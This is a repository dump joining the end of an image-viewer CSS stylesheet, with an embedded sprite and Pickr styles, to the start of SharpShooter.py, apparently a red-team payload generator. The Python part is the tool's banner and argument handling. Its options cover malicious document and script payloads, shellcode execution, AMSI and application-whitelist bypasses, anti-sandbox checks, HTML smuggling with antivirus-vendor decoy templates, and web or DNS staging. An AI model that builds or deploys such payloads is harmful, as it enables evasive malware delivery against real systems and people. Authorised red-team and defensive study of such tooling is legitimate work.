line-height: 0; 181 | border: none; 182 | cursor: pointer; 183 | overflow: hidden; 184 | } 185 | 186 | .oit-main-container-view .img-footer .img-toolbar > li:hover { 187 | animation: bounce .5s cubic-bezier(0.51, 0.23, 0.02, 0.96) 188 | } 189 | 190 | @keyframes bounce { 191 | 0% { 192 | transform: scale(1, 1); 193 | } 194 | 195 | 50% { 196 | transform: scale(0.85, 1.1) translateY(-5px); 197 | } 198 | } 199 | 200 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_to_100::before, 201 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_in::before, 202 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_out::before, 203 | .oit-main-container-view .img-footer .img-toolbar .toolbar_full_screen::before, 204 | .oit-main-container-view .img-footer .img-toolbar .toolbar_refresh::before, 205 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_left::before, 206 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_right::before, 207 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_x::before, 208 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_y::before, 209 | .oit-main-container-view .img-footer .img-toolbar .toolbar_invert_color::before, 210 | .oit-main-container-view .img-footer .img-toolbar .toolbar_copy::before { 211 | font-size: 0; 212 | line-height: 0; 213 | display: block; 214 | width: 25px; 215 | height: 25px; 216 | color: transparent; 217 | background-image: url(data:image/png;base64,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); 218 | background-repeat: no-repeat 219 | } 220 | 221 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_to_100::before { 222 | content: 'Zoom to Actual Size'; 223 | background-position: 0 0 224 | } 225 | 226 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_in::before { 227 | content: 'Zoom In'; 228 | background-position: -25px 0 229 | } 230 | 231 | .oit-main-container-view .img-footer .img-toolbar .toolbar_zoom_out::before { 232 | content: 'Zoom Out'; 233 | background-position: -50px 0 234 | } 235 | 236 | .oit-main-container-view .img-footer .img-toolbar .toolbar_full_screen::before { 237 | content: 'Full Screen'; 238 | background-position: -75px 0 239 | } 240 | 241 | .oit-main-container-view .img-footer .img-toolbar .toolbar_refresh::before { 242 | content: 'Refresh'; 243 | background-position: -100px 0 244 | } 245 | 246 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_left::before { 247 | content: 'Rotate Left'; 248 | background-position: -125px 0 249 | } 250 | 251 | .oit-main-container-view .img-footer .img-toolbar .toolbar_rotate_right::before { 252 | content: 'Rotate Right'; 253 | background-position: -150px 0 254 | } 255 | 256 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_x::before { 257 | content: 'Scale x'; 258 | background-position: -175px 0 259 | } 260 | 261 | .oit-main-container-view .img-footer .img-toolbar .toolbar_scale_y::before { 262 | content: 'Scale y'; 263 | background-position: -200px 0 264 | } 265 | 266 | .oit-main-container-view .img-footer .img-toolbar .toolbar_invert_color::before { 267 | content: 'Invert color'; 268 | background-position: -225px 0 269 | } 270 | 271 | .oit-main-container-view .img-footer .img-toolbar .toolbar_copy::before { 272 | content: 'Copy'; 273 | background-position: -250px 0 274 | } 275 | 276 | /*====== gallery-navbar start ======*/ 277 | .oit-main-container-view .img-footer .gallery-navbar { 278 | position: relative; 279 | flex: 0 0 auto; 280 | overflow: hidden; 281 | max-width: 100%; 282 | max-height: 100%; 283 | width: 100%; 284 | height: 60px; 285 | margin-top: 20px; 286 | background-color: rgba(0, 0, 0, .1); 287 | } 288 | 289 | .oit-main-container-view .img-footer .gallery-navbar:hover { 290 | background-color: rgba(0, 0, 0, .8); 291 | } 292 | 293 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list { 294 | display: flex; 295 | transform: translateX(0px); 296 | cursor: pointer; 297 | } 298 | 299 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list .gallery-active { 300 | opacity: 1; 301 | } 302 | 303 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list .img-border-active { 304 | margin-top: 1px; 305 | border-width: 1px; 306 | border-style: solid; 307 | border-color: red; 308 | } 309 | 310 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list > li { 311 | width: 48px; 312 | height: 58px; 313 | opacity: .3; 314 | color: transparent; 315 | margin: 2px 1px; 316 | padding: 0; 317 | border-radius: 0; 318 | /* transition: all 100ms linear; */ 319 | } 320 | 321 | .oit-main-container-view .img-footer .gallery-navbar .gallery-list img { 322 | width: 46px; 323 | height: 56px; 324 | } 325 | 326 | /*====== gallery-navbar end ======*/ 327 | 328 | /*====== pickr start ======*/ 329 | .pcr-app .pcr-swatches > button { 330 | padding: 0; 331 | } 332 | 333 | /*! Pickr 1.8.2 MIT | https://github.com/Simonwep/pickr */ 334 | .pickr {position: relative;overflow: visible;transform: translateY(0)} .pickr * {box-sizing: border-box;outline: none;border: none;-webkit-appearance: none} .pickr .pcr-button {position: relative;height: 2em;width: 2em;padding: 0.5em;cursor: pointer;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Helvetica Neue", Arial, sans-serif;border-radius: .15em;background: url('data:image/svg+xml;utf8, ') no-repeat center;background-size: 0;transition: all 0.3s} .pickr .pcr-button::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: .5em;border-radius: .15em;z-index: -1} .pickr .pcr-button::before {z-index: initial} .pickr .pcr-button::after {position: absolute;content: '';top: 0;left: 0;height: 100%;width: 100%;transition: background 0.3s;background: var(--pcr-color);border-radius: .15em} .pickr .pcr-button.clear {background-size: 70%} .pickr .pcr-button.clear::before {opacity: 0} .pickr .pcr-button.clear:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px var(--pcr-color)} .pickr .pcr-button.disabled {cursor: not-allowed} .pickr *, .pcr-app * {box-sizing: border-box;outline: none;border: none;-webkit-appearance: none} .pickr input:focus, .pickr input.pcr-active, .pickr button:focus, .pickr button.pcr-active, .pcr-app input:focus, .pcr-app input.pcr-active, .pcr-app button:focus, .pcr-app button.pcr-active {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px var(--pcr-color)} .pickr .pcr-palette, .pickr .pcr-slider, .pcr-app .pcr-palette, .pcr-app .pcr-slider {transition: box-shadow 0.3s} .pickr .pcr-palette:focus, .pickr .pcr-slider:focus, .pcr-app .pcr-palette:focus, .pcr-app .pcr-slider:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px rgba(0, 0, 0, 0.25)} .pcr-app {position: fixed;display: flex;flex-direction: column;z-index: 10000;border-radius: 0.1em;background: #fff;opacity: 0;visibility: hidden;transition: opacity 0.3s, visibility 0s 0.3s;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Helvetica Neue", Arial, sans-serif;box-shadow: 0 0.15em 1.5em 0 rgba(0, 0, 0, 0.1), 0 0 1em 0 rgba(0, 0, 0, 0.03);left: 0;top: 0} .pcr-app.visible {transition: opacity 0.3s;visibility: visible;opacity: 1} .pcr-app .pcr-swatches {display: flex;flex-wrap: wrap;margin-top: 0.75em} .pcr-app .pcr-swatches.pcr-last {margin: 0} @supports (display: grid) { .pcr-app .pcr-swatches {display: grid;align-items: center;grid-template-columns: repeat(auto-fit, 1.75em)} } .pcr-app .pcr-swatches > button {font-size: 1em;position: relative;width: calc(1.75em - 10px);height: calc(1.75em - 10px);border-radius: 0.15em;cursor: pointer;margin: 2.5px;flex-shrink: 0;justify-self: center;transition: all 0.15s;overflow: hidden;background: transparent;z-index: 1} .pcr-app .pcr-swatches > button::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: 6px;border-radius: .15em;z-index: -1} .pcr-app .pcr-swatches > button::after {content: '';position: absolute;top: 0;left: 0;width: 100%;height: 100%;background: var(--pcr-color);border: 1px solid rgba(0, 0, 0, 0.05);border-radius: 0.15em;box-sizing: border-box} .pcr-app .pcr-swatches > button:hover {filter: brightness(1.05)} .pcr-app .pcr-swatches > button:not(.pcr-active) {box-shadow: none} .pcr-app .pcr-interaction {display: flex;flex-wrap: wrap;align-items: center;margin: 0 -0.2em 0 -0.2em} .pcr-app .pcr-interaction > * {margin: 0 0.2em} .pcr-app .pcr-interaction input {letter-spacing: 0.07em;font-size: 0.75em;text-align: center;cursor: pointer;color: #75797e;background: #f1f3f4;border-radius: .15em;transition: all 0.15s;padding: 0.45em 0.5em;margin-top: 0.75em} .pcr-app .pcr-interaction input:hover {filter: brightness(0.975)} .pcr-app .pcr-interaction input:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px rgba(66, 133, 244, 0.75)} .pcr-app .pcr-interaction .pcr-result {color: #75797e;text-align: left;flex: 1 1 8em;min-width: 8em;transition: all 0.2s;border-radius: .15em;background: #f1f3f4;cursor: text} .pcr-app .pcr-interaction .pcr-result::-moz-selection {background: #4285f4;color: #fff} .pcr-app .pcr-interaction .pcr-result::selection {background: #4285f4;color: #fff} .pcr-app .pcr-interaction .pcr-type.active {color: #fff;background: #4285f4} .pcr-app .pcr-interaction .pcr-save, .pcr-app .pcr-interaction .pcr-cancel, .pcr-app .pcr-interaction .pcr-clear {color: #fff;width: auto} .pcr-app .pcr-interaction .pcr-save, .pcr-app .pcr-interaction .pcr-cancel, .pcr-app .pcr-interaction .pcr-clear {color: #fff} .pcr-app .pcr-interaction .pcr-save:hover, .pcr-app .pcr-interaction .pcr-cancel:hover, .pcr-app .pcr-interaction .pcr-clear:hover {filter: brightness(0.925)} .pcr-app .pcr-interaction .pcr-save {background: #4285f4} .pcr-app .pcr-interaction .pcr-clear, .pcr-app .pcr-interaction .pcr-cancel {background: #f44250} .pcr-app .pcr-interaction .pcr-clear:focus, .pcr-app .pcr-interaction .pcr-cancel:focus {box-shadow: 0 0 0 1px rgba(255, 255, 255, 0.85), 0 0 0 3px rgba(244, 66, 80, 0.75)} .pcr-app .pcr-selection .pcr-picker {position: absolute;height: 18px;width: 18px;border: 2px solid #fff;border-radius: 100%;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none} .pcr-app .pcr-selection .pcr-color-palette, .pcr-app .pcr-selection .pcr-color-chooser, .pcr-app .pcr-selection .pcr-color-opacity {position: relative;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;display: flex;flex-direction: column;cursor: grab;cursor: -webkit-grab} .pcr-app .pcr-selection .pcr-color-palette:active, .pcr-app .pcr-selection .pcr-color-chooser:active, .pcr-app .pcr-selection .pcr-color-opacity:active {cursor: grabbing;cursor: -webkit-grabbing} .pcr-app[data-theme='nano'] {width: 14.25em;max-width: 95vw} .pcr-app[data-theme='nano'] .pcr-swatches {margin-top: .6em;padding: 0 .6em} .pcr-app[data-theme='nano'] .pcr-interaction {padding: 0 .6em .6em .6em} .pcr-app[data-theme='nano'] .pcr-selection {display: grid;grid-gap: .6em;grid-template-columns: 1fr 4fr;grid-template-rows: 5fr auto auto;align-items: center;height: 10.5em;width: 100%;align-self: flex-start} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview {grid-area: 2 / 1 / 4 / 1;height: 100%;width: 100%;display: flex;flex-direction: row;justify-content: center;margin-left: .6em} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview .pcr-last-color {display: none} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview .pcr-current-color {position: relative;background: var(--pcr-color);width: 2em;height: 2em;border-radius: 50em;overflow: hidden} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-preview .pcr-current-color::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: .5em;border-radius: .15em;z-index: -1} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-palette {grid-area: 1 / 1 / 2 / 3;width: 100%;height: 100%;z-index: 1} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-palette .pcr-palette {border-radius: .15em;width: 100%;height: 100%} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-palette .pcr-palette::before {position: absolute;content: '';top: 0;left: 0;width: 100%;height: 100%;background: url('data:image/svg+xml;utf8, ');background-size: .5em;border-radius: .15em;z-index: -1} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser {grid-area: 2 / 2 / 2 / 2} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity {grid-area: 3 / 2 / 3 / 2} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser, .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity {height: 0.5em;margin: 0 .6em} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser .pcr-picker, .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity .pcr-picker {top: 50%;transform: translateY(-50%)} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser .pcr-slider, .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity .pcr-slider {flex-grow: 1;border-radius: 50em} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-chooser .pcr-slider {background: linear-gradient(to right, red, #ff0, lime, cyan, blue, #f0f, red)} .pcr-app[data-theme='nano'] .pcr-selection .pcr-color-opacity .pcr-slider {background: linear-gradient(to right, transparent, black), url('data:image/svg+xml;utf8, ');background-size: 100%, 0.25em} 335 | 336 | /*====== pickr end ======*/ 337 | 338 | .hotkeys-settings-plus { 339 | margin: 0 10px; 340 | font-size: x-large; 341 | } 342 | -------------------------------------------------------------------------------- /Tools/SharpShooter/SharpShooter.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # -*- coding: utf-8 -*- 4 | # 5 | # SharpShooter: 6 | # Payload Generation with CSharp and DotNetToJScript 7 | # Version: 8 | # 2.0 9 | # Author: 10 | # Dominic Chell (@domchell), MDSec ActiveBreach (@mdseclabs) 11 | 12 | from __future__ import print_function 13 | 14 | import base64 15 | import gzip 16 | import random 17 | import string 18 | import sys 19 | import argparse 20 | from jsmin import jsmin 21 | from modules import * 22 | 23 | try: 24 | raw_input 25 | input = raw_input 26 | except NameError: 27 | pass 28 | 29 | try: 30 | from cStringIO import StringIO as BytesIO 31 | except ImportError: 32 | from io import BytesIO 33 | 34 | 35 | class SharpShooter: 36 | banner = """ 37 | _____ __ _____ __ __ 38 | / ___// /_ ____ __________ / ___// /_ ____ ____ / /____ _____ 39 | \__ \/ __ \/ __ `/ ___/ __ \\__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/ 40 | ___/ / / / / /_/ / / / /_/ /__/ / / / / /_/ / /_/ / /_/ __/ / 41 | /____/_/ /_/\__,_/_/ / .___/____/_/ /_/\____/\____/\__/\___/_/ 42 | /_/ 43 | 44 | \033[1;32mDominic Chell, @domchell, MDSec ActiveBreach, v2.0\033[0;0m 45 | """ 46 | 47 | def validate_args(self): 48 | print(self.banner) 49 | 50 | antisandbox = "\n\033[92m[1]\033[0;0m Key to Domain (e.g. 1=CONTOSO)" 51 | antisandbox += "\n\033[92m[2]\033[0;0m Ensure Domain Joined" 52 | antisandbox += "\n\033[92m[3]\033[0;0m Check for Sandbox Artifacts" 53 | antisandbox += "\n\033[92m[4]\033[0;0m Check for Bad MACs" 54 | antisandbox += "\n\033[92m[5]\033[0;0m Check for Debugging" 55 | 56 | parser = argparse.ArgumentParser(description="", formatter_class=argparse.RawTextHelpFormatter) 57 | parser.add_argument("--stageless", action='store_true', help="Create a stageless payload") 58 | parser.add_argument("--dotnetver", metavar="", dest="dotnetver", default=None, help="Target .NET Version: 2 or 4") 59 | parser.add_argument("--com", metavar="", dest="comtechnique", default=None, help="COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote") 60 | parser.add_argument("--awl", metavar="", dest="awltechnique", default=None, help="Application Whitelist Bypass Technique: wmic, regsvr32") 61 | parser.add_argument("--awlurl", metavar="", dest="awlurl", default=None, help="URL to retrieve XSL/SCT payload") 62 | parser.add_argument("--payload", metavar="", dest="payload", default=None, help="Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk") 63 | parser.add_argument("--sandbox", metavar="", dest="sandbox", default=None, help="Anti-sandbox techniques: " + antisandbox) 64 | parser.add_argument("--amsi", metavar="", dest="amsi", default=None, help="Use amsi bypass technique: amsienable") 65 | parser.add_argument("--delivery", metavar="", dest="delivery", default=None, help="Delivery method: web, dns, both") 66 | parser.add_argument("--rawscfile", metavar="", dest="rawscfile", default=None, help="Path to raw shellcode file for stageless payloads") 67 | parser.add_argument("--shellcode", action='store_true', help="Use built in shellcode execution") 68 | parser.add_argument("--scfile", metavar="", dest="shellcode_file", default=None, help="Path to shellcode file as CSharp byte array") 69 | parser.add_argument("--refs", metavar="", dest="refs", default=None, help="References required to compile custom CSharp,\ne.g. mscorlib.dll,System.Windows.Forms.dll") 70 | parser.add_argument("--namespace", metavar="", dest="namespace", default=None, help="Namespace for custom CSharp,\ne.g. Foo.bar") 71 | parser.add_argument("--entrypoint", metavar="", dest="entrypoint", default=None, help="Method to execute,\ne.g. Main") 72 | parser.add_argument("--web", metavar="", dest="web", default=None, help="URI for web delivery") 73 | parser.add_argument("--dns", metavar="", dest="dns", default=None, help="Domain for DNS delivery") 74 | parser.add_argument("--output", metavar="", dest="output", default=None, help="Name of output file (e.g. maldoc)") 75 | parser.add_argument("--smuggle", action='store_true', help="Smuggle file inside HTML") 76 | parser.add_argument("--template", metavar="", dest="template", default=None, help="Name of template file (e.g. mcafee)") 77 | 78 | args = parser.parse_args() 79 | 80 | if not args.dotnetver and not args.payload=="slk": 81 | print("\033[1;31m[!]\033[0;0m Missing --dotnetver argument") 82 | sys.exit(-1) 83 | else: 84 | if not args.payload=="slk": 85 | try: 86 | dotnetver = int(args.dotnetver) 87 | 88 | if (not dotnetver == 2 and not dotnetver == 4): 89 | raise Exception 90 | except Exception as e: 91 | print("\033[1;31m[!]\033[0;0m Invalid .NET version") 92 | sys.exit(-1) 93 | 94 | if not args.payload: 95 | print("\033[1;31m[!]\033[0;0m Missing --payload argument") 96 | sys.exit(-1) 97 | if not args.delivery and not args.stageless and not args.payload=="slk": 98 | print("\033[1;31m[!]\033[0;0m Missing --delivery argument") 99 | sys.exit(-1) 100 | if not args.output: 101 | print("\033[1;31m[!]\033[0;0m Missing --output argument") 102 | sys.exit(-1) 103 | 104 | if(args.stageless) and (args.delivery or args.dns or args.web): 105 | print("\033[1;31m[!]\033[0;0m Stageless payloads are not compatible with delivery arguments") 106 | sys.exit(-1) 107 | 108 | if(args.delivery == "both"): 109 | if(not args.web or not args.dns): 110 | print("\033[1;31m[!]\033[0;0m Missing --web and --dns arguments") 111 | sys.exit(-1) 112 | elif(args.delivery == "web"): 113 | if not args.web: 114 | print("\033[1;31m[!]\033[0;0m Missing --web arguments") 115 | sys.exit(-1) 116 | elif(args.delivery == "dns"): 117 | if not args.dns: 118 | print("\033[1;31m[!]\033[0;0m Missing --dns arguments") 119 | sys.exit(-1) 120 | elif(args.delivery): 121 | print("\033[1;31m[!]\033[0;0m Invalid delivery method") 122 | sys.exit(-1) 123 | 124 | if(not args.shellcode and not args.stageless and not args.payload=="slk"): 125 | if not args.refs or not args.namespace or not args.entrypoint: 126 | print("\033[1;31m[!]\033[0;0m Custom CSharp selected, --refs, --namespace and --entrypoint arguments required") 127 | sys.exit(-1) 128 | else: 129 | if(not args.shellcode_file and not args.stageless and not args.payload=="slk"): 130 | print("\033[1;31m[!]\033[0;0m Built-in CSharp template selected, --scfile argument required") 131 | sys.exit(-1) 132 | 133 | if(args.stageless and not args.rawscfile): 134 | print("\033[1;31m[!]\033[0;0m Stageless payloads require the --rawscfile argument") 135 | sys.exit(-1) 136 | 137 | if(args.smuggle): 138 | if not args.template: 139 | print("\033[1;31m[!]\033[0;0m Template name required when smuggling") 140 | sys.exit(-1) 141 | 142 | if(args.comtechnique): 143 | if not args.awlurl: 144 | print("\033[1;31m[!]\033[0;0m --awlurl required when COM staging") 145 | sys.exit(-1) 146 | 147 | if(args.payload == "macro" and args.smuggle): 148 | print("\033[1;31m[!]\033[0;0m Macro payload cannot be smuggled") 149 | sys.exit(-1) 150 | 151 | if(args.payload == "macro" and not args.comtechnique=="xslremote"): 152 | print("\033[1;31m[!]\033[0;0m Macro payload requires the --com xsmlremote and --awlurl arguments") 153 | sys.exit(-1) 154 | 155 | if(args.payload == "slk" and args.comtechnique): 156 | print("\033[1;31m[!]\033[0;0m SLK payloads do not currently support COM staging") 157 | sys.exit(-1) 158 | 